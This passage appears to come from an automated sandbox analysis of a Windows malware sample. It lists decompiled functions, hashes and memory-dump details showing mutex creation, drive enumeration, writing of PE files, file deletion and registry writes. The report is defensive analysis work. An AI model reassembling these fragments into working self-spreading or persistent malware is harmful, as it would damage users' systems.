                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: MZP
                                                            • API String ID: 2738559852-2889622443
                                                            • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                            • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                            • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                            • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404BE0(void* __eax, long __ecx, void* __edx) {
                                                            				int _t2;
                                                            				void* _t3;
                                                            				void* _t7;
                                                            				DWORD* _t9;
                                                            
                                                            				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
                                                            				_t3 = _t7;
                                                            				if(_t2 == 0) {
                                                            					return 0;
                                                            				}
                                                            				return _t3;
                                                            			}

                                                            Instruction addresses: 0x00404bea - 0x00404bf7

                                                            APIs
                                                            • WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID: MZP
                                                            • API String ID: 3934441357-2889622443
                                                            • Opcode ID: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                            • Instruction ID: cd8d274a544879f86d75f83ceab2a9824fbef203ff2d66308718860d554d7d3d
                                                            • Opcode Fuzzy Hash: 83a29245ac6b35b996f4ce35e430c7ef2da10dd3d2364903d861bf1a917f60bf
                                                            • Instruction Fuzzy Hash: 4EC04CA11582083AF51051A7AC06F233A5CC781698F114436BB08E1581F456F8011079
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00401788: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                              • Part of subcall function 00401788: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                              • Part of subcall function 00401788: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                              • Part of subcall function 00401788: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                            • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401FF0), ref: 00401EBF
                                                            • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401FF7), ref: 00401FEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                            • String ID:
                                                            • API String ID: 2227675388-0
                                                            • Opcode ID: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                            • Instruction ID: c8d1828e50afdd1ef66478082c2fc5af823077db28515af4f228c2db3bc24797
                                                            • Opcode Fuzzy Hash: 24205a5bcb3744ab7aeb7e662ffdb7704d8f0e00ee709498c29b313c1ff4e1e9
                                                            • Instruction Fuzzy Hash: 8A419BB2A043029FD714CF69DE81A2AB7B0FB59318B18827FD441E72F1D739A8518A49
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E0040759C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				void* _t11;
                                                            				void* _t17;
                                                            				void* _t32;
                                                            				intOrPtr _t38;
                                                            				void* _t44;
                                                            				void* _t46;
                                                            				intOrPtr _t49;
                                                            
                                                            				_t56 = __fp0;
                                                            				_t45 = __esi;
                                                            				_t48 = _t49;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_push(_t49);
                                                            				_push(0x40765c);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t49; // executed
                                                            				_t11 = E00406E94(__ebx, __ecx, __edi, __esi, __eflags, __fp0); // executed
                                                            				if(_t11 != 0) {
                                                            					_t40 = 0x14;
                                                            					E00407080(0x4091c8, 0x14, 0x14);
                                                            					_t17 = E00404018(0, 0, 0x4091c8); // executed
                                                            					_t44 = _t17;
                                                            					if(GetLastError() != 0xb7) {
                                                            						E00406D40( &_v8, __ebx, _t44, __esi); // executed
                                                            						_t32 = E0040320C(_v8);
                                                            						_t53 = _t32;
                                                            						if(_t32 > 0) {
                                                            							_t46 = 1;
                                                            							do {
                                                            								E004031B4();
                                                            								_t40 = 0x407674;
                                                            								E00403214( &_v12, 0x407674);
                                                            								E004074B4(_v12, _t32, _t44, _t46, _t53, _t48); // executed
                                                            								_pop(0x14);
                                                            								_t46 = _t46 + 1;
                                                            								_t32 = _t32 - 1;
                                                            								_t54 = _t32;
                                                            							} while (_t32 != 0);
                                                            						}
                                                            						E00406E0C(_t32, 0x14, _t40, _t44, _t45, _t54, _t56);
                                                            						ReleaseMutex(_t44);
                                                            					}
                                                            				}
                                                            				_pop(_t38);
                                                            				 *[fs:eax] = _t38;
                                                            				_push(E00407663);
                                                            				return E004030B8( &_v12, 2);
                                                            			}

                                                            Instruction addresses: 0x0040759c - 0x0040765b

                                                            APIs
                                                              • Part of subcall function 00404018: CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                            • GetLastError.KERNEL32(00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 004075E5
                                                              • Part of subcall function 00406D40: GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000,?,00408205,00000000,00408220), ref: 0040763C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Mutex$CreateDriveErrorLastLogicalReleaseStrings
                                                            • String ID:
                                                            • API String ID: 676290295-0
                                                            • Opcode ID: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                            • Instruction ID: a50fa674edadcb4b051b0a96f5935ee5b8f91fbc0aee7086ed6abe5ddad9c237
                                                            • Opcode Fuzzy Hash: 0b1858c04844e63bceb42a1c2aae0906aae676d4158ef1d644554abea356ae6a
                                                            • Instruction Fuzzy Hash: A2110A306446086BD710BBA6CC42B5E7B6CCB81714F5004BBFA017B3C3CA3DAD04816E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004012A0(void* __eax, void** __edx) {
                                                            				void* _t3;
                                                            				void** _t8;
                                                            				void* _t11;
                                                            				long _t14;
                                                            
                                                            				_t8 = __edx;
                                                            				if(__eax >= 0x100000) {
                                                            					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                            				} else {
                                                            					_t14 = 0x100000;
                                                            				}
                                                            				_t8[1] = _t14;
                                                            				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                            				_t11 = _t3;
                                                            				 *_t8 = _t11;
                                                            				if(_t11 != 0) {
                                                            					_t3 = E00401154(0x40a5d4, _t8);
                                                            					if(_t3 == 0) {
                                                            						VirtualFree( *_t8, 0, 0x8000);
                                                            						 *_t8 = 0;
                                                            						return 0;
                                                            					}
                                                            				}
                                                            				return _t3;
                                                            			}

                                                            Instruction addresses: 0x004012a3 - 0x00401302

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012CF
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004015A9), ref: 004012F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            • Opcode ID: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                            • Instruction ID: 90e8f67b1060bd1251f945ff82b9078c1ba764c12e4cd0c6011b14969f372c3f
                                                            • Opcode Fuzzy Hash: 677c0526faf000c49acf14ba7c711909bb3502ece2a084bb3d0e397bba4ce0ca
                                                            • Instruction Fuzzy Hash: 97F02773B006205BEB206A6A4D81B4369C59F59B90F1400BAFB4CFF3D9DA798C0043A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 45%
                                                            			E00405200(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				void* _t22;
                                                            				void* _t30;
                                                            				void* _t31;
                                                            				void* _t39;
                                                            				intOrPtr _t41;
                                                            				intOrPtr _t46;
                                                            
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_t30 = __eax;
                                                            				_push(_t46);
                                                            				_push(0x405291);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t46;
                                                            				E00404ED0(__eax,  &_v16);
                                                            				_push(_v16);
                                                            				E00404EEC( &_v20);
                                                            				_pop(_t39); // executed
                                                            				E00405080(_v20, _t30,  &_v8, _t39, __esi); // executed
                                                            				_t31 = 1;
                                                            				while(_v8 != 0) {
                                                            					E00404798( &_v8,  &_v12, E004052A8);
                                                            					if(_t31 == 0 || DeleteFileA(E0040340C(_v12)) == 0) {
                                                            						_t22 = 0;
                                                            					} else {
                                                            						_t22 = 1;
                                                            					}
                                                            					_t31 = _t22;
                                                            				}
                                                            				_pop(_t41);
                                                            				 *[fs:eax] = _t41;
                                                            				_push(E00405298);
                                                            				return E004030B8( &_v20, 4);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00405080: FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                              • Part of subcall function 00405080: FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405291,?,?,00000000,00000000,00000000,00000000,?,00407736,?,?,?,00000000,0040798C), ref: 0040525F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFind$CloseDeleteFirst
                                                            • String ID:
                                                            • API String ID: 3969940835-0
                                                            • Opcode ID: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                            • Instruction ID: 7b79426e1ef5d484ccb35ed710867a40efa654d54104ddfac4c0367765dd07f6
                                                            • Opcode Fuzzy Hash: 238fab5c7ccdf0ad421be398039805a42527f4fe23ed0a78c41523e31c8e5186
                                                            • Instruction Fuzzy Hash: BF01A174604608AFDB04EBA1CC529AF73ACEF45304F5048BEF901B3281E678AE059E68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040578C(void* __eax, void* __ecx, void* __edx) {
                                                            				void* _t4;
                                                            				char* _t7;
                                                            				long _t10;
                                                            				void* _t12;
                                                            
                                                            				_t12 = __eax;
                                                            				if(__eax == 0) {
                                                            					L2:
                                                            					return 0;
                                                            				}
                                                            				_t4 = E0040320C(__ecx);
                                                            				_t7 = E0040340C(__ecx);
                                                            				_t10 = RegSetValueExA(_t12, E0040340C(__edx), 0, 1, _t7, _t4 + 1); // executed
                                                            				if(_t10 == 0) {
                                                            					return 1;
                                                            				}
                                                            				goto L2;
                                                            			}

                                                            APIs
                                                            • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001,?,?,00000000,00407AA2,00000000,00407AC4,?,?,00000000,00000000), ref: 004057B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                            • Instruction ID: 82ccab74ab13a132c34841d8e2f7e51fc97cb509c9d1c97b6ea97491bda523d5
                                                            • Opcode Fuzzy Hash: 8fc1d0df2935156870a761a9e005f3ed3dcf16a2c3928d3d316ee70feded526d
                                                            • Instruction Fuzzy Hash: 17E04F5131061166E511256A0CC1A7B0D9D8B44A56F04043BB904EF2C3D968CD0321A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00406CA8(void* __eax, int __ecx, void* __edx) {
                                                            				char* _t6;
                                                            				void* _t7;
                                                            				void* _t8;
                                                            				void* _t11;
                                                            				int _t16;
                                                            
                                                            				_t16 = __ecx;
                                                            				_t11 = __eax;
                                                            				E004064E4(__eax);
                                                            				_t6 = E0040340C(__edx);
                                                            				_t7 =  *0x40a650; // 0x400000
                                                            				_t8 = ExtractIconA(_t7, _t6, _t16); // executed
                                                            				if(_t8 > 1) {
                                                            					return E00406520(_t11, _t8);
                                                            				}
                                                            				return _t8;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                            • ExtractIconA.SHELL32(00400000,00000000,00000000), ref: 00406CC7
                                                              • Part of subcall function 00406520: GetIconInfo.USER32(?), ref: 00406540
                                                              • Part of subcall function 00406520: GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                              • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406566
                                                              • Part of subcall function 00406520: DeleteObject.GDI32(?), ref: 00406574
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$DeleteIcon$CursorDestroyExtractInfo
                                                            • String ID:
                                                            • API String ID: 2619871307-0
                                                            • Opcode ID: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                            • Instruction ID: 3dd68c7f1dd4f5608f9b9662a0ba171f3b5b53225b24c93893625578eb0e5390
                                                            • Opcode Fuzzy Hash: 12884ea93cf9522b21f7407772e5477059801f61b384028fea43c793ebaab2fd
                                                            • Instruction Fuzzy Hash: 32D05E767002202BC321B6BF2CC181B8ADDCACA269316453FB109F7293C97DCC12126D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040575C(void* __eax, void* __ecx, void* __edx) {
                                                            				long _t4;
                                                            				void* _t7;
                                                            				void** _t12;
                                                            
                                                            				_t7 = __eax;
                                                            				_t4 = RegOpenKeyExA(_t7, E0040340C(__edx), 0, 0x2001f, _t12); // executed
                                                            				if(_t4 != 0) {
                                                            					 *_t12 = 0;
                                                            				}
                                                            				return  *_t12;
                                                            			}

                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,0002001F,?,?,?,?,00407A60,00000000,00407AC4,?,?,00000000,00000000,00000000), ref: 00405774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                            • Instruction ID: 3a3203429d587fd7172cf24d4e67cc15a32e0ac6e1cd073cd859d0159acdf75a
                                                            • Opcode Fuzzy Hash: 069e22fb027c4afddc5b5976f6d816458c7a75ea1a42f49c021bc25e4846d371
                                                            • Instruction Fuzzy Hash: 7AD05EA13046107EE210B62A5C81FBB6ACCCB487A6F00053AF948E6283D225CD0052A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404F34(void* __eax, void* __edx) {
                                                            				char _v268;
                                                            				long _t6;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            
                                                            				_t13 = __edx;
                                                            				_t6 = GetShortPathNameA(E0040340C(__eax),  &_v268, 0x104); // executed
                                                            				return E00403184(_t13, _t6, _t14);
                                                            			}

                                                            APIs
                                                            • GetShortPathNameA.KERNEL32(00000000,?,00000104), ref: 00404F52
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: NamePathShort
                                                            • String ID:
                                                            • API String ID: 1295925010-0
                                                            • Opcode ID: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                            • Instruction ID: 14e814bc68ad69d6c3dbd45ca29a6777f0e45ac5a2bbd03733d3eefc14da3dab
                                                            • Opcode Fuzzy Hash: abb4d550bda5475c99f0f2794432747b4105fc54e92a365e7278d0c8b630ade4
                                                            • Instruction Fuzzy Hash: C9D05EE1B0021027D200B66D1CC2A9BA6CC4B88729F14413A7758EB2D2E9798E1402D9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 66%
                                                            			E00404B68(CHAR* __eax, unsigned int __edx) {
                                                            				CHAR* _t1;
                                                            				void* _t2;
                                                            				long _t6;
                                                            				long _t9;
                                                            
                                                            				_t9 = __edx;
                                                            				_t1 = __eax;
                                                            				_push(0);
                                                            				_t6 = __edx >> 0x00000010 & 0x00001fff;
                                                            				if(_t6 == 0) {
                                                            					_t6 = 0x80;
                                                            				}
                                                            				_t2 = CreateFileA(_t1, 0, _t9, 0, _t9, _t6, ??); // executed
                                                            				return _t2;
                                                            			}

                                                            APIs
                                                            • CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                            • Instruction ID: ecc9e2cd6cddaadd7fb33e9927afed1fcbe410aa9616ae81c498ff4a473f225f
                                                            • Opcode Fuzzy Hash: eea2c6d1fddd31fd331317c09d3e296815bd40418f117fca415fb9ec57fe0382
                                                            • Instruction Fuzzy Hash: F9C012E15641113EFA0C22587C37FBB128D83D4714C90962EB206A77D1C458280041AC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00404018(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                            				void* _t8;
                                                            				CHAR* _t4; // declaration missing from decompiler output; holds the mutex name (_a12)
                                                            
                                                            				_t4 = _a12;
                                                            				asm("sbb eax, eax");
                                                            				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                            				return _t8;
                                                            			}

                                                            APIs
                                                            • CreateMutexA.KERNEL32(00408220,00408206,00408205,?,004075E3,00000000,00000000,004091C8,00000000,0040765C,?,?,?,?,00000000,00000000), ref: 0040402E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateMutex
                                                            • String ID:
                                                            • API String ID: 1964310414-0
                                                            • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                            • Instruction ID: 31d529539147b31f913da60fb79b32c9d72b995d2910e43382fd7a33128a04fb
                                                            • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                                                            • Instruction Fuzzy Hash: 8AC01273150248ABC700EEA9DC05D9B33DC5758609B008825B618D7100C139E5909B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E00404EB0(void* __eax) {
                                                            				int _t4;
                                                            
                                                            				_t4 = CreateDirectoryA(E0040340C(__eax), 0); // executed
                                                            				asm("sbb eax, eax");
                                                            				return _t4 + 1;
                                                            			}

                                                            APIs
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00404E7A,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C), ref: 00404EBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateDirectory
                                                            • String ID:
                                                            • API String ID: 4241100979-0
                                                            • Opcode ID: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                            • Instruction ID: 54881843ca4f04485c80971131db710ee83c2c1d717b1f588eca7c15a420d4f4
                                                            • Opcode Fuzzy Hash: 386e56552f8266bde2ccc84166bcc5ed92a1d83404cd9177086d901dfc68956f
                                                            • Instruction Fuzzy Hash: 71B092927542401AEA003ABA2CC2B2A098C974460EF10093AF206EA283D47AC9050014
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404B9C() {
                                                            				void* _t3;
                                                            				long _t5;
                                                            				void* _t6;
                                                            				void* _t10;
                                                            
                                                            				_t5 = GetFileAttributesA(E00404490(_t3)); // executed
                                                            				_t6 = _t5 + 1;
                                                            				_t10 = _t6;
                                                            				if(_t10 != 0) {
                                                            					return _t6 - 0x00000001 & 0 | _t10 == 0x00000000;
                                                            				}
                                                            				return _t6;
                                                             			}

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                            • Instruction ID: b116303671e024f583cda4c1147e2dbfbac77b887c659148fe5224e5fd1b100a
                                                            • Opcode Fuzzy Hash: 8025a4ee7f9a6a5e32ffee1429e28f2d9b7c921bde027667d06e53d93cfb3014
                                                            • Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404CF8(CHAR* __eax) {
                                                            				long _t4;
                                                            				void* _t5;
                                                            				void* _t9;
                                                            
                                                            				_t4 = GetFileAttributesA(__eax); // executed
                                                            				_t5 = _t4 + 1;
                                                            				_t9 = _t5;
                                                            				if(_t9 != 0) {
                                                            					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
                                                            				}
                                                            				return _t5;
                                                             			}

                                                            APIs
                                                            • GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,004076D4,00000000,0040798C,?,0000144A), ref: 00404CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                            • Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
                                                            • Opcode Fuzzy Hash: 1dfe280059354c2d3b00f373a1eb4cf2bc4e4ec1fc5d2a6436fb04a1a0edb6b0
                                                            • Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404BB4(void* __eax, signed int __ecx, long __edx) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
                                                            				return _t2;
                                                             			}

                                                            APIs
                                                            • SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.939658662.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.939639704.0000000000400000.00000002.00020000.sdmp
                                                             • Associated: 00000000.00000002.939682295.0000000000409000.00000004.00020000.sdmp
                                                             • Associated: 00000000.00000002.939709688.0000000000418000.00000002.00020000.sdmp
                                                            Yara matches
